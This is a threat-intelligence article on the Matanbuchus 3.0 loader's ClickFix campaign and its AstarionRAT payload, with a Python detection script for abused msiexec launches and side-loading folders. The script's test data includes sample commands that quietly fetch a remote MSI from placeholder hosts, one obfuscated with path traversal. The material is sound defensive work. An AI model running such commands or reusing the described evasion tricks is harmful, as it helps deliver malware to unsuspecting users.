Matanbuchus, a prominent Malware-as-a-Service (MaaS) loader, has re-emerged in February 2026 after an extended absence of nearly a year. The latest version, Matanbuchus 3.0, boasts a complete code overhaul and now carries a substantial monthly subscription fee of up to $15,000, a significant increase from its previous pricing structure. This evolution suggests a strategic shift by its operators towards highly targeted, high-value operations rather than broad-scale spam campaigns. This sophisticated threat is employing the “ClickFix” social engineering tactic to compromise systems, bypassing traditional security measures by exploiting user trust.
The ClickFix technique tricks unsuspecting users into manually executing malicious commands by presenting fake browser errors or software update notifications. Victims are prompted to copy a command and paste it into PowerShell or the Windows Run dialog. The malicious URLs used in these attacks employ obfuscation techniques, including backslashes and path traversal sequences, to evade detection by logging systems. Because the user technically initiates the command execution, many standard email and perimeter defenses are circumvented. Once executed, the command triggers a silent installation process that proceeds without any visible user interface, making it difficult for users to detect.
Matanbuchus 3.0 Deploys AstarionRAT via Silent MSI Installations
Huntress analysts have identified that this renewed campaign deploys a novel payload, dubbed AstarionRAT, immediately following the initial infection. This custom remote access trojan is equipped with an array of twenty-four distinct commands, designed for comprehensive system compromise. These capabilities include credential theft and the establishment of SOCKS5 proxy connections, enabling further malicious activity. The impact of an AstarionRAT infection can be swift, with threat actors reportedly achieving lateral movement across a compromised network within forty minutes, often targeting domain controllers.
The ultimate objective of these Matanbuchus 3.0 attacks, according to security researchers, appears to be the deployment of ransomware or the exfiltration of sensitive data. This makes early detection and response absolutely critical for enterprise security teams aiming to mitigate potential damage. The use of silent MSI installations further enhances the stealth capabilities of the malware, making it a significant threat to organizations.
The Silent Infection Chain Leverages Deceptive Tactics
The infection mechanism employed by Matanbuchus 3.0 is intentionally layered to evade automated detection systems. It commences when a victim executes a mixed-case `msiexec` command, which is designed to fetch a payload from a newly registered domain. Upon execution, the installer places a legitimate, albeit vulnerable, Zillya Antivirus binary alongside a malicious DLL file. These files are strategically dropped into deceptive directories that mimic the names of legitimate vendors, such as “AegisLynx” or “DocuRay.”
To further mask its activities and evade analysis, the malware uses a renamed copy of the 7-Zip utility to extract a password-protected archive containing the subsequent stages of the attack. The vulnerable antivirus binary then loads the malicious DLL through DLL side-loading, allowing it to decrypt and execute the core Matanbuchus loader. This intricate process culminates in the launch of an embedded Lua interpreter, which executes the final AstarionRAT payload directly in memory.
This method of in-memory execution leaves minimal forensic artifacts on the disk, posing a challenge for incident responders attempting to reconstruct the attack. Security teams are advised to enhance their endpoint detection systems by configuring them to flag `msiexec` commands that incorporate mixed-case characters or exhibit suspicious URL patterns. It is crucial to monitor for the creation of unusual directories within the `%APPDATA%` environment and to scrutinize network connections to recently registered domains. Furthermore, comprehensive employee training is essential to educate staff on the dangers of pasting raw commands into their terminals, a key step in preventing manual infections.
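The detection guidance above (mixed-case `msiexec`, suspicious URL patterns in the command line, unusual vendor-named directories under `%APPDATA%`) can be turned into concrete checks. The following Python is an added example, not Huntress detection content and not code from the campaign. The event format and field names (`parent`, `cmdline`) are assumed to come from a generic EDR export, the sample command lines, file names and `.invalid` URLs are constructed for the example, and the allowlist of known Roaming folders is a placeholder to tune against a real baseline.

```python
"""Heuristic checks for ClickFix-style msiexec abuse and side-loading staging dirs.
Added example: not Huntress detection content and not code from the campaign."""
import re

# Constructed process-creation events in a generic EDR-export shape (assumed
# field names). URLs use the reserved .invalid TLD so nothing here resolves.
SAMPLE_EVENTS = [
    {   # Benign: a local package installed from disk, normal casing, no URL.
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool-1.2.msi"',
    },
    {   # Suspicious: mixed-case binary name, remote package fetched quietly,
        # backslashes and a traversal sequence embedded in the URL.
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"MsIeXeC /i http://update-check.invalid\..\pkg\fix.msi /qn",
    },
    {   # Suspicious: Run-dialog launch (explorer parent) of a remote package.
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"msiexec /quiet /i https://cdn-docs.invalid/v2/DocuRay.msi",
    },
]

# Constructed file-creation paths; the folder names are the ones the article
# cites, the file names inside them are made up for the example.
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Roaming\Microsoft\Teams\settings.json",
    r"C:\Users\alice\AppData\Roaming\AegisLynx\engine.exe",
    r"C:\Users\alice\AppData\Roaming\AegisLynx\engine.dll",
    r"C:\Users\alice\AppData\Roaming\DocuRay\readme.txt",
]

MSIEXEC_TOKEN = re.compile(r"^(?:.*[\\/])?(msiexec)(?:\.exe)?$", re.IGNORECASE)
URL_ARG = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_FLAG = re.compile(r"(?:^|\s)/(?:qn|qb|quiet|q)(?:\s|$)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
SHELL_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "explorer.exe"}
# Placeholder allowlist of Roaming folders; tune against a real baseline.
KNOWN_ROAMING_DIRS = {"microsoft", "mozilla", "google"}
ROAMING_DIR = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\([^\\]+)\\", re.IGNORECASE)


def split_cmdline(cmdline):
    """Cheap Windows-style tokenizer: keep double-quoted runs together."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def score_msiexec_event(event):
    """Return the list of reasons an msiexec launch looks like ClickFix abuse."""
    tokens = split_cmdline(event["cmdline"])
    if not tokens:
        return []
    m = MSIEXEC_TOKEN.match(tokens[0].strip('"'))
    if not m:
        return []  # not an msiexec launch; out of scope for this rule
    reasons = []
    # Humans and installers write msiexec, MSIEXEC or Msiexec; any other
    # casing is a copy-paste artefact worth flagging on its own.
    if m.group(1) not in ("msiexec", "MSIEXEC", "Msiexec"):
        reasons.append("mixed-case msiexec token")
    urls = URL_ARG.findall(event["cmdline"])
    if urls:
        reasons.append("remote package URL")
        for url in urls:
            if "\\" in url:
                reasons.append("backslash inside URL")
            if TRAVERSAL.search(url):
                reasons.append("path traversal inside URL")
        if QUIET_FLAG.search(event["cmdline"]):
            reasons.append("quiet install of remote package")
        # Parent only matters together with a URL: every double-clicked MSI
        # has explorer.exe as parent, so alone it would be pure noise.
        parent = event.get("parent", "").lower().rsplit("\\", 1)[-1]
        if parent in SHELL_PARENTS:
            reasons.append("launched from " + parent)
    return reasons


def triage(events, threshold=2):
    """Indices of events whose reason count reaches the alert threshold."""
    return [i for i, ev in enumerate(events) if len(score_msiexec_event(ev)) >= threshold]


def suspicious_roaming_dirs(paths):
    """Non-allowlisted %APPDATA% folders that received both an .exe and a .dll,
    the on-disk shape of the side-loading pair described in the article."""
    exts_by_dir = {}
    for path in paths:
        m = ROAMING_DIR.match(path)
        if not m or m.group(1).lower() in KNOWN_ROAMING_DIRS:
            continue
        exts_by_dir.setdefault(m.group(1), set()).add(path.lower().rsplit(".", 1)[-1])
    return sorted(d for d, exts in exts_by_dir.items() if {"exe", "dll"} <= exts)


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_msiexec_event(SAMPLE_EVENTS[i]))
    print(suspicious_roaming_dirs(SAMPLE_FILES))
```

The casing check is deliberately a stand-alone signal, since no legitimate installer spells the binary `MsIeXeC`; the URL, quiet-flag and parent-process signals are scored together so that a plain double-click install from disk never reaches the threshold. The Roaming-folder check looks for the exe-plus-DLL pair rather than the folder name, because the vendor-like names change between campaigns while the side-loading layout does not.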
The continued evolution and increased sophistication of malware loaders like Matanbuchus 3.0 underscore the persistent and adaptive nature of cyber threats. Organizations must remain vigilant and continuously update their security postures to counter these evolving attack vectors. The high subscription cost of Matanbuchus 3.0 suggests a growing demand for advanced MaaS solutions, and it is likely that similar threats leveraging sophisticated social engineering and stealthy deployment methods will continue to emerge.